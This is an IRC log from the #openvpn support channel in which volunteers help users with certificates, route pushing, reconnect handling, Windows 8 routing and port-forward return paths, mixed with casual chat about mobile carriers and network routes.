10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds]
10:28 < Eduard_Munteanu> pekster: yeah, I suppose that should do. I mostly wanted encryption and all that because it's cheap these days :)
10:29 <+pekster> No real need for that unless you can't have your content (ie: the chunks going over the wire) in the clear. The solution to that without a true mesh setup would be to use gpg to encrypt the files before you seed them in the p2p swarm
10:29 <+pekster> signing and encryption are separate operations in gpg
10:29 <+pekster> You can use one, the other, or both
10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:30 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbhuhodavdvolbuq] has quit [Ping timeout: 244 seconds]
10:31 <+pekster> A mesh is an interesting solution for your needs, I just think it's overly complicated for what you ultimately want
10:31 -!- kirin` [telex@gateway/shell/anapnea.net/x-uvulotxunalwtwsa] has joined #openvpn
10:32 <+pekster> And it still won't help you if one of your nodes is somehow compromised into sending bad data to other peers (that probably wouldn't pass the .torrent file's own hashing scheme, but it's not as cryptographically secure as gpg signatures are)
10:32 < Eduard_Munteanu> Might take a shot at implementing it, it simplifies things greatly if I can just rely on openvpn instead of adhoc solutions (however straightforward they may be).
10:32 <+pekster> So it's both more complex, and less useful to you in terms of verifying file origin
10:33 < Eduard_Munteanu> BTW, does openvpn distribute the server certificate to the clients?
10:34 < Eduard_Munteanu> AFAICT, you'd only need the CA cert on the client to verify it.
10:34 <+pekster> Certs from each end are exchanged during the initial TLS handshake
10:34 <+pekster> Right, you don't ever need your peer's certificate available locally as it comes over the wire from the peer itself
10:35 <+pekster> Just the ca.crt, and your own cn.crt and cn.key files (you can put them in a .p12 if you prefer, or just name all 3 in your config file)
10:35 <+pekster> There are nice howto docs on setting up a server to handle multiple clients:
10:35 <+pekster> !howto
10:35 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
10:36 < Eduard_Munteanu> Yeah, I already have such a server set up.
10:37 <+pekster> FYI, gpg sigs can use any of the hashes you see in 'gpg --version'
10:37 <+pekster> Mine supports up to SHA512 (no sha3 yet, but that's new enough not to be in most mainstream projects)
10:38 < Eduard_Munteanu> Yeah, I'm a bit uneasy about SHA1 too, most PKI stuff still uses that. :(
10:38 <+pekster> Only if you tell it
10:38 <+pekster> openssl defaults to sha1, but all my PKI certs (ca and all peers) are signed using at least SHA256
10:38 <+pekster> easy-rsa doesn't default to that, but it's easy to adjust the openssl.cnf file to do it (see default_md options, and you may need to add that yourself in the [req] section)
10:41 < Eduard_Munteanu> AFAICT there's only one big piece missing... some sort of peer discovery. I guess the rest is pretty much already handled in openvpn.
10:42 < kjs> I have an issue, other people VPN'ing can access a specific subnet but I can't - I assume this is a route problem from my client?
10:42 <+pekster> kjs: Other people using the same VPN? If so, then it's obviously on your side. Are the routes getting added, and have you verified you don't have overlapping networks that cause the access issue?
10:44 < kjs> I can't see the route, I attempted to add it by hand. But still no joy
10:44 < Eduard_Munteanu> Maybe the server is denying you access / not forwarding traffic?
10:44 < Eduard_Munteanu> Do you admin the server as well?
10:45 <+pekster> kjs: It's possible the server treats specific users differently via ccd or --client-connect scripting handling routes/firewalling uniquely per client; do you know if that's the case? Check your logs at 'verb 5' to see exactly what the client is getting pushed and check for errors. Post logs if you need help parsing them, but it should be pretty clear from the logs re: pushed options/routes
10:46 < kjs> pekster: fixed it, was a route issue, I re-added it manually.. and it works now
10:46 < kjs> thanks :D
10:46 < Eduard_Munteanu> Mm, you shouldn't have to, though.
10:47 <+pekster> Not if it's being pushed correctly and didn't give an error when adding it on VPN init
10:47 <+pekster> Presumably it's not a policy problem or the admin should have firewalled it properly :P
10:47 <+pekster> (and yes, I've set up VPN accounts for contractors before where I'm quite careful to limit them to what their in-house management says they should have access to ;)
10:48 < kjs> it's not in the server config, I suspect because it's the management subnet
10:48 < kjs> and they don't want other people accessing it (directly)
10:48 <+pekster> Ah, sure. We went through a phase where our management subnet (outside of our /16 supernet for all other corp stuff) wasn't pushed, and we eventually pushed the smaller network to VPN clients. Or maybe just our IT team, I forget
10:49 <+pekster> Keep in mind not pushing a route doesn't keep people off it who know how to add routes themselves ;)
10:49 <+pekster> That's the job of a firewall
10:49 <+pekster> -A FORWARD -i tun+ -j ACCEPT is a popular netfilter rule, but often bad in a corp environment :P
10:50 -!- brute11k1 [~brute11k@89.249.235.236] has quit [Ping timeout: 264 seconds]
10:50 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn
10:51 -!- p47 [~p47@189.134.208.202] has joined #openvpn
10:51 < PlasmaHH> pekster: thanks, that diagram helped somewhat, although "correctly configure the iroute" should have somehow mentioned that the filename needs to be the client name as shown in e.g. the ifconfig-pool-persist file, and not as in the CN from the certificate (which is how I read http://openvpn.net/index.php/open-source/documentation/howto.html)
10:51 <@vpnHelper> Title: HOWTO (at openvpn.net)
10:51 <+pekster> PlasmaHH: It does need to match the CN from the X509 cert
10:52 <+pekster> (unless you're using --username-as-cn, but then you should know what that's doing anyway)
10:53 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
10:53 -!- mode/#openvpn [+o krzee] by ChanServ
10:53 <+pekster> Mind you that DN and CN are unique and shouldn't be confused; OpenVPN uses the CN field of the DN of the cert to identify unique users
10:55 < PlasmaHH> well, it currently has different filenames. Anyways, I need to get home and test it from other clients there
10:55 -!- PlasmaHH [~plasmahh@213.61.9.75] has quit []
10:57 <+pekster> Interesting; I wonder if (s)he was using weird chars OpenVPN internally remapped
10:58 <@krzee> g'day pekster
10:58 <+pekster> Morning
10:58 <@krzee> in case you were wondering, verizon's commercials were telling the truth
10:58 <@krzee> their network is really that much better
10:59 <+pekster> LTE?
10:59 <@krzee> yep
10:59 <@krzee> ive been driving around california testing 4 different mobile hotspots with my darknet voip network
10:59 <@krzee> the verizon one is much better than the others
10:59 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"]
10:59 <+hazardous> krzee that's so weird
10:59 <+hazardous> how does att fare
10:59 <@krzee> it works in random places in the middle of nowhere
10:59 <+hazardous> heh
11:00 <@krzee> t-mobile and att work in major areas
11:00 <+hazardous> my tmobile hotspot
11:00 <+hazardous> worked only in sf proper
11:00 <@krzee> virgin works well when it works
11:00 <+hazardous> it dropped off literally as soon as it exited
11:00 <+hazardous> and started working in la
11:00 <@krzee> exactly
11:00 <+hazardous> also
11:00 <@krzee> but verizon worked along the entire 5
11:00 <+hazardous> tmobile does DPI
11:00 <+hazardous> and forbids tethering while roaming
11:00 <+hazardous> even at reduced speeds
11:00 <@krzee> including much of the grapevine
11:00 <+hazardous> so even if it says there's service
11:00 <+hazardous> you still can't tether
11:00 <+hazardous> or use a hotspot properly
11:00 <@krzee> no no, these are wifi hotspots
11:00 <+hazardous> oh
11:00 <@krzee> they always tether
11:00 <+hazardous> mine was an actual one
11:01 <+hazardous> not a phone
11:01 <@krzee> oh ok
11:01 <+hazardous> iirc virgin = verizon?
11:01 <@krzee> nope
11:01 <@krzee> sprint iirc
11:01 <+hazardous> ah
11:01 <+pekster> I've used my phone's 3G (I have 4G w/ sprint, but rarely use it due to battery suckage) and I've plugged it in via NDIS/USB to an OpenWRT router that runs OpenVPN
11:01 <+hazardous> i think they use the same devices or something
11:01 -!- raidz_away is now known as raidz
11:01 <+hazardous> because the autospawned wifi ssid is similar
11:01 <+hazardous> and weird
11:01 <+pekster> One of these days when I'm the passenger on a long ride I should try to VPN in back home and do work for the trip :P
11:01 <@krzee> verizon is the only one that worked well on the road from vegas to san diego, and from la to the bay
11:02 <+hazardous> on sprint i had service at la
11:02 <+hazardous> d
11:02 <+hazardous> dropped off until SLO
11:02 <+hazardous> then a mile or two then dropped off until sf
11:02 <+pekster> I used my phone for streaming audio via 3G, and it worked nearly everywhere except the CO mountains (major highways mostly)
11:03 <+hazardous> hahaha CO mountains
11:03 <+hazardous> i went through there twice last month/this month
11:03 <@krzee> im rolling around with a AC splitter, a power inverter and 2 micro-usb car adapters
11:03 <+pekster> I even got Netflix streaming in Eloy AZ (not far off the interstate, but it is literally the middle of nowhere in the desert)
11:03 <@krzee> then my inverter has a usb plug for micro-usb
11:03 <@krzee> then i plugin my laptop and more micro-usb cables
11:03 <+pekster> Netflix on a phone is surprisingly fun to watch, especially when it's your only entertainment
11:03 <+hazardous> pekster: i had literally zero service in the co mountains as sprint
11:03 <@krzee> 4 hotspots, 2 cellphones, and a secure mobile device, all on micro-usb
11:03 <@krzee> lol
11:04 <+hazardous> is it weird that i pick up multiple hotspot service usually prepaid when i travel
11:04 <+hazardous> because i really need internet on the trip
11:04 <+pekster> krzee: I used an inverter a couple years ago to literally build a Gentoo OS from scratch in a car doing 70 mph from MN to IA. I had a headless PC, RS232 cable, my laptop, and an ext-hdd with the full gentoo source mirror
11:04 <+pekster> That PC was the router for the LAN-gaming event ;)
11:04 <@krzee> haha
11:04 <@krzee> nice
11:05 <+pekster> I finish the build and firewall just as we pull into the parking lot and plug it in. ~15 mins after we stopped I began serving the LAN full web connectivity
11:05 <+pekster> That was a fun drive
11:05 <+hazardous> i lost a can of soda today
11:05 <+pekster> I found one
11:05 <+hazardous> hah
11:05 <+pekster> Must be the world's way of keeping everything in balance
11:06 <+hazardous> pekster: it fell out of my bag
11:06 <+hazardous> and just rolled downhill
11:06 <+hazardous> for like three blocks
11:06 <+hazardous> didn't even bother chasing it
11:06 <+pekster> Hmm, not a Dr Pepper, was it?
11:06 <+hazardous> nah, red bull zero
11:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 276 seconds]
11:06 <+hazardous> it just rolled until it disappeared
11:06 <+hazardous> i need to start double bagging but they're 0,10
11:06 <@krzee> i had to fix a server in LA… hd died so i picked up a new one from best buy, $100 for 1tb, $80 for 320gig so i bought the 1tb, turned out my bios couldnt handle the 1tb
11:06 <@krzee> so i went back and got the 320gb lol
11:07 <+hazardous> ..hahahah what
11:07 <@krzee> had to get a new power supply as well
11:07 <@krzee> but then it turned out the shop had connections with the 1 supplier of the mobile devices i needed to buy wholesale, and gave me a great price
11:07 <+hazardous> the shop = best buy?
11:07 <@krzee> so the extra time it took ended up benefiting me, i would not have made the distribution deal otherwise
11:08 <@krzee> no, the guys who im colo'ing with
11:08 <@krzee> although i need to talk to best buy b2b as well, but dont expect a better price from them
11:08 <+hazardous> expect assfucking exclusivity contracts though
11:08 <@krzee> hells no
11:09 <+pekster> Do you get a clause that lets you stay with them exclusively if they offer you lower prices? :P
11:09 <+hazardous> must order minimum x devices per calendar month
11:09 <+hazardous> orders must increase monthly
11:09 <+pekster> Lame
11:10 <+hazardous> probably offtopic but can anyone recommend me a place that does hosted mail properly
11:10 <+hazardous> just need 3 mailboxes and a catchall
11:11 <+hazardous> google apps not free anymore ;v;
11:12 <@krzee> screw exclusivity and rules with bestbuy
11:13 <@krzee> im using their distributor anyways with no rules
11:13 <@krzee> paying cost + 2% to my contact that has deals with them already
11:13 <@krzee> i could save the 2% but i like working with the guy and thats only like $4 / unit
11:14 <@krzee> and a layer of abstraction feels nice even when not needed at all, habit i guess lol
11:15 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:17 -!- Assid [~kvirc@unaffiliated/assid] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/]
11:30 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 244 seconds]
11:32 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
11:41 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn
11:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
11:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
11:53 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
11:57 -!- thinkHell [~Hell@ks399220.kimsufi.com] has joined #openvpn
11:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
11:58 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
11:58 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
11:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
12:00 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
12:01 -!- thinkHell [~Hell@ks399220.kimsufi.com] has quit [Ping timeout: 272 seconds]
12:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
12:07 -!- Orbi [~opera@anon-163-28.vpn.ipredator.se] has joined #openvpn
12:07 < Orbi> hello
12:08 < fys> Oh god fuck my life.
12:08 < fys> I knew this was going to bite me in the ass sooner or later.
12:08 < fys> I fucking knew it.
12:11 < Orbi> I have a pppoe reconnect at 4am daily
12:12 < Orbi> I wrote this cron job to kill openvpn and bring it back up
12:12 -!- sauce [sauce@unaffiliated/sauce] has quit [Read error: Operation timed out]
12:12 < Orbi> Could someone have a look, because it's not working: 0 4 * * * root killall openvpn; sleep 20; openvpn --config /tmp/openvpncl/openvpn.conf
12:13 <+pekster> Orbi: What's wrong with using --keepalive and letting it automatically reconnect if the uplink reconnect takes it out?
12:14 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn
12:14 < Orbi> would that also work in case I get assigned a new IP?
12:14 < Orbi> I just checked my config and keepalive 10 30 is enabled
12:14 <+pekster> Orbi: Use --float on the server side, and if anything on the client side maybe a SIGUSR1 is needed (see the manpage)
12:15 <+pekster> What is the problem client-side when your pppoe reconnect occurs?
12:15 <+pekster> With --keepalive 10 30, your client will notice no later than 30 seconds after a downed connection
12:16 < Orbi> I'm not in charge of the server side :)
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=908277 event_wait : Interrupted system call (code=4)
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=910293 TCP/UDP: Closing socket
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=910567 /sbin/route del -net 93.182.149.130 netmask 255.255.255.255
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=912009 ERROR: Linux route delete command failed: could not execute external program
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=912281 /sbin/route del -net 0.0.0.0 netmask 128.0.0.0
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=913707 ERROR: Linux route delete command failed: could not execute external program
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=913995 /sbin/route del -net 128.0.0.0 netmask 128.0.0.0
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=915425 ERROR: Linux route delete command failed: could not execute external program
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=915612 Closing TUN/TAP interface
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=915769 /sbin/ifconfig tun0 0.0.0.0
12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=917192 Linux ip addr del failed: could not execute external program
12:16 <+pekster> Please don't do that
12:16 <+pekster> Use a pastebin
12:16 < Orbi> sorry
12:16 <+pekster> It's bad form on IRC because it's hard to read and detracts from conversation
12:17 < Orbi> I'll read into SIGUSR1
12:18 -!- nand` is now known as `nand`
12:18 <+pekster> That's probably all you need, although you'll need to stop downgrading your permissions if the server possibly hands you a new IP (looks like you're using --user and/or --group due to the failures to remove routes on disconnect.)
12:19 <+pekster> No need to SIGTERM and then re-launch the client instance as long as it's not completely exiting on you
12:20 < Orbi> I'm indeed running the client with reduced privileges
12:21 <+pekster> You can't do that if you expect a new IP from the server to work after a reconnect event
12:21 <+pekster> Either run an external script to configure routes/addressing for such cases, or don't downgrade permissino
12:21 <+pekster> permission*
12:21 < Orbi> Wouldn't SIGHUP work then?
12:22 <+pekster> No, because you require root access to set the tap IP
12:22 <+pekster> eg: try 'ip addr add 127.0.0.2/8 dev lo' as a non-root user and watch it fail
12:23 <+pekster> It might work with SIGUSR1 and --persist-key --persist-tun, but that will cause you problems if the server assigns you a new IP for whatever reason
12:23 < Orbi> Yes, it might SIGUSR1 -- Conditional restart, designed to restart without root privileges
12:24 < Orbi> It's my ISP's IP that changes daily
12:24 <+pekster> Read the --user option in the manpage, since you'll need the relevant --persist options for that to work
12:25 <+pekster> And you really want --float on the server-side if you expect that to do what you want
12:25 <+pekster> --keepalive will at least reconnect you even if that doesn't work
12:25 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
12:26 <+pekster> Then send the process a USR1 signal rather than the clunky term/wait/restart steps. You can probably hook into your distro's features for DHCP action to do that on-demand and not rely on cron to do it
12:26 <+pekster> (that's the cleaner solution)
12:26 < Orbi> even though my IP address changed? Doesn't the tun interface need to be closed since the ip address changed?
12:27 < Orbi> interesting solution, I'm really getting to learn all this stuff
12:27 <+pekster> Read the --persist-tun option. You can't use USR1 "soft-restarts" when dropping user privs
12:27 <+pekster> Manpage describes that very clearly in the --user option too
12:28 <+pekster> Read about those, SIGUSR1, and --float and you should be able to answer your own questions
12:28 < Orbi> ok, so at some point it might be a tradeoff between user privileges and functionality?
12:30 < Orbi> I'll look into it, thanks for answering pekster
12:39 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has quit [Read error: Connection reset by peer]
12:50 -!- nameless` [~nameless@u1c.eu] has quit [Read error: Operation timed out]
12:50 -!- dvl [~dan@pdpc/supporter/active/dvl] has quit [Ping timeout: 255 seconds]
12:51 -!- dvl [~dan@nyi.unixathome.org] has joined #openvpn
12:51 -!- nameless` [~nameless@u1c.eu] has joined #openvpn
12:52 -!- mndo [~mndo@bl15-215-4.dsl.telepac.pt] has quit [Quit: going home]
12:52 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Remote host closed the connection]
12:54 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood]
12:56 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn
12:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 255 seconds]
13:01 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds]
13:20 -!- raidz is now known as raidz_away
13:21 -!- raidz_away is now known as raidz
13:25 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 260 seconds]
13:25 -!- APTX_ [~APTX@unaffiliated/aptx] has joined #openvpn
13:26 -!- mattock_ [~mattock@raidz.im] has joined #openvpn
13:26 -!- mattock_ [~mattock@raidz.im] has quit [Changing host]
13:26 -!- mattock_ [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
13:26 -!- mode/#openvpn [+o mattock_] by ChanServ
13:27 -!- sauce_ [sauce@ool-ad02ad20.dyn.optonline.net] has joined #openvpn
13:27 -!- thermoman_ [~thermoman@idle.foobar0815.de] has joined #openvpn
13:28 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 245 seconds]
13:28 -!- mattock_ is now known as mattock
13:30 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 260 seconds]
13:30 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 260 seconds]
13:30 -!- thermoman [~thermoman@idle.foobar0815.de] has quit [Ping timeout: 260 seconds]
13:30 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 260 seconds]
13:35 -!- dvl [~dan@nyi.unixathome.org] has quit [Changing host]
13:35 -!- dvl [~dan@pdpc/supporter/active/dvl] has joined #openvpn
13:36 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn
13:54 < p47> I can not connect to vpn it says error and I made all I'm trying with ubuntu
13:54 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.]
13:54 < p47> does anybody here can help me ?
13:54 < ngharo> what says error
13:54 < p47> I'm trying to connect windows + ubuntu
13:55 < p47> ngharo, connecting to client has failed
13:59 -!- Radex [br@debian.pl] has left #openvpn []
14:17 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn
14:18 < Sickness\> I am connected to the openvpn network at my work from home, I'm trying to connect to a server using putty but it tells me the host does not exist (I only know the hostname of the box)
14:19 < Sickness\> this worked fine before without having to set anything additional
14:20 < Sickness\> I've tried pinging some boxes that I do know should be up but no luck and since I'm connected to the vpn I doubt its a fw issue (which is disabled atm btw)
14:20 <+pekster> Sickness\: Maybe they're not pushing DNS or it doesn't work for a variety of reasons (not properly updated in OS, or generic Windows DNS multihoming issues.) Try 'dig @ip-of-corporate-dns hostname-of-interest' (or do it via nslookup or your other favourite resolution tool)
14:22 <+pekster> Making DNS work for Windows clients in a corporate network is rather tricky, and I've written careful client-side code in the past for former employers to make it seamless to users due to the issues around it. You can read about the --register-dns option and add it to your client .ovpn file if you want to try it
14:22 < Sickness\> hm
14:22 < Sickness\> maybe it's windows 8 related, I'm not using that at work
14:23 < Sickness\> since there, it works flawlessly using the same methods (the actual vpn is on a foreign server)
14:23 <+pekster> Near as I could tell using the developer preview, OpenVPN worked on win8 like it did on 7
14:23 <+pekster> It's not like win8 really does anything fundamentally different than 7 besides metro anyway
14:24 < Sickness\> not when it comes to these things for as far as I know no
14:25 < Sickness\> hm, just realized the vpn network might be conflicting with the virtualbox network I have here
14:25 < Sickness\> nope
14:29 < Eduard_Munteanu> Hm, the connection setup code seems rather tightly-coupled with options.
14:31 < Eduard_Munteanu> Is there some helper I can use to set up a new server/client? init_instance seems to rely on option parsing to set up the context etc..
14:31 -!- Aketzu [akolehma@kelvin.aketzu.net] has joined #openvpn
14:33 < Eduard_Munteanu> Maybe I should set up a whole new context.
14:34 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
14:35 < Eduard_Munteanu> Is there a developer channel, btw?
14:44 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has joined #openvpn
14:45 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
14:46 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has joined #openvpn
14:47 < TechSmurf> Any ideas why I can't snmpwalk a device across a tunnel?
14:49 < Eduard_Munteanu> Ouch, the server multi-client code is a lot of code.
14:52 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
14:55 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving]
15:14 -!- Orbi [~opera@anon-163-28.vpn.ipredator.se] has quit [Ping timeout: 272 seconds]
15:15 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn
15:16 < CrashTM> anyone home?
15:16 <+hazardous> dont think so
15:17 < CrashTM> >.>
15:17 <+hazardous> ?
15:18 < CrashTM> why must forwarding a port to a openvpn client be so hard
15:18 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn
15:18 <+hazardous> lol what are you trying to do
15:18 <+hazardous> i can help google or something but i don't really use openvpn so :x
15:19 < TechSmurf> correction: any ideas why I can't pass udp traffic across a tunnel?
15:19 < CrashTM> i will use minecraft for an example. if a client wanted to host a minecraft server it needs port 25565 to be open.
15:20 < CrashTM> the point of hosting it over a vpn is so that the public ip will not be the clients personal ip
15:21 < CrashTM> i have the server running and it works yet i am unable to forward all the traffic on port 25565 to the client
15:22 <+hazardous> does the inbound traffic hit the client?
15:22 <+hazardous> in the first place
15:22 <+hazardous> might be return path thats the prob
15:23 < CrashTM> no, when connected to the vpn, the client can not be seen when trying to connect to it
15:23 < CrashTM> when the vpn is not enabled i can connect to the server fine
15:24 < CrashTM> as soon as i connect it cannot be seen.
15:24 < CrashTM> i have setup static ips for my clients
15:30 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer]
15:35 -!- thermoman_ is now known as thermoman
15:36 < Sickness\> pff I finally did it on windows 8
15:37 < Sickness\> apparently windows 8 does do something fundamentally different compared to 7 pekster
15:37 < Sickness\> took me ~3 hours to get around this routing issue
15:38 < Sickness\> for anyone who's curious or might run into this in the future with windows 8 clients
15:38 < Sickness\> You need to install "RAS Connection Manager" as a windows feature (under programs and features)
15:38 < Sickness\> and add route-method exe to your openvpn config
15:39 <+pekster> I always use route-method exe with >=Vista
15:39 < Sickness\> I have never been forced to use it in Windows 7 over the past year ;(
15:40 <+pekster> Some of that might depend on local configuration
15:40 <+pekster> RRAS shouldn't ever be required to act as a client; I suspect something else was going on
15:40 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:40 <+pekster> I did test the dev preview of Win8, and it added routes normally, at least for a tun setup where I pushed a couple routes along with the connection
15:41 < Sickness\> well this was the only method I got working
15:42 < Sickness\> I have no idea why but installing the RAS connection manager admin kit helped
15:42 < Sickness\> Oh well, just happy it works now, now I can finally fix that live bug :P
15:43 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 260 seconds]
15:47 < CrashTM> anyone?
15:48 < TechSmurf> figured it out.. for some reason the return path was different for snmpwalk than ping
15:49 * TechSmurf thinks
15:49 < TechSmurf> no, ping just didn't care
15:49 < TechSmurf> either way it was sourcing from the tun interface ip, which I hadn't accounted for
15:50 < TechSmurf> dunno why iperf failed over udp, but whatever. snmp is working :P
15:51 <+pekster> CrashTM: If you're forwarding a port on the VPN server's public IP to a VPN client, how are you handling the return routing?
15:52 < CrashTM> great question
15:52 < CrashTM> no idea
15:52 < CrashTM> XD
15:52 <+pekster> You need the client to route the reply packets back across the VPN
15:53 < CrashTM> any idea on how i might do that?
15:53 <+pekster> Either redirect all client traffic via --redirect-gateway, or set up policy routing
15:53 < CrashTM> ok
15:55 <+pekster> Pretty sure you've been shown that a few times before
15:55 <+pekster> Some basic routing knowledge will make your life a lot easier. A lack of understanding why you need your return route for the client's reply traffic across the VPN is going to make understanding what is wrong very hard
15:55 <+pekster> !tcpip
15:55 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
15:56 * TechSmurf nods
15:57 < TechSmurf> basically the traffic has to come back along its original route
15:58 <+pekster> Well, that's not completely true, but it needs to be sourced from the same IP as the original request was bound to
15:58 < TechSmurf> if A sends data to B and expects a reply from B, it won't know what to do if the reply comes from C instead.
15:58 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
15:58 <+pekster> (which in his case means the same thing)
15:58 < Eduard_Munteanu> Depends on rp_filter.
15:58 < TechSmurf> pekster: in my head it just visualizes nicely as a line-return vs loop-return
15:59 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 255 seconds]
15:59 < TechSmurf> but yeah, the point is the replying ip has to match the original dest ip
15:59 <+pekster> Sure, but the reality of the Internet is that 2 packets sent right after one another (and each of their return packets) can take different routes depending on network conditions and any issues along the wa
15:59 <+pekster> But yea, the endpoints don't care about routing path, just the IPs/ports matching expected values
15:59 < TechSmurf> as long as none of them somehow get routed over level3 I'm ok.
16:00 < TechSmurf> :P
16:00 < TechSmurf> I really hope that sentiment of mine is outdated and level3 has improved ;)
16:00 <+pekster> I'll keep you off layer3.net and send you through 12 Chinese gateways instead ;)
16:00 <+hazardous> nothing wrong with level3
16:00 < TechSmurf> might be layer3
16:00 <+hazardous> if anything i'd like to yell at cogent
16:01 < TechSmurf> I dunno. back around 2000 when I was mudding one of the backbones was a haven of lag
16:01 <+hazardous> cogent routed me from norcal -> texas -> chicago -> ny -> uk -> germany -> singapore -> aus
16:01 <+hazardous> i just.. i don't know
16:01 < TechSmurf> ouch.
16:01 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds]
16:01 -!- p47 [~p47@189.134.208.202] has quit [Quit: Saliendo]
16:01 <+hazardous> that was an amazing 500ms though
16:01 < TechSmurf> :|
16:01 <+hazardous> instead of just going down to sj or la and going over peering
16:01 <+hazardous> at 130-150
16:02 <+hazardous> laughed pretty hard
16:02 <+hazardous> also on another server, ny to nj went through washington dc and chicago
16:02 <+hazardous> cogent -> telia -> he -> telia -> cogent
16:02 < TechSmurf> I like my route to that mud these days..
16:02 < TechSmurf> twtc -> twtc
16:03 <+hazardous> cable or telecom
16:03 < TechSmurf> tc
16:03 <+hazardous> twtelecom.net is entirely unrelated to time warner cable
16:03 <+hazardous> also what's a mud
16:03 < TechSmurf> text rpg
16:05 < TechSmurf> what irc is to skype, muds are to WoW
16:06 < Eduard_Munteanu> Heh, nice description.
16:06 < Eduard_Munteanu> (stands for multi-user dungeon, btw)
16:06 <+pekster> Ugh, beat me to that :P
16:06 < TechSmurf> (or mush,muck,moo,whatever)
16:07 < TechSmurf> multi-user shared hallucination...
16:07 < TechSmurf> props to whoever coined that one
16:08 < TechSmurf> twtelecom is entirely unrelated to time warner anything anymore
16:09 < TechSmurf> afaik
16:09 < TechSmurf> they were real big on that name change a few years back
16:10 < TechSmurf> regardless, they were the first company to agree to a fiber buildout for us.
16:10 < TechSmurf> it was merely convenient that they already had our t1
16:16 -!- WaffleScratch [~chatzilla@S010600226b8a7cc5.vn.shawcable.net] has joined #openvpn
16:16 < TechSmurf> thanks folks!
16:16 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has left #openvpn []
16:22 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:25 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has joined #openvpn
16:31 -!- dazo is now known as dazo_afk
16:38 -!- WaffleScratch [~chatzilla@S010600226b8a7cc5.vn.shawcable.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]]
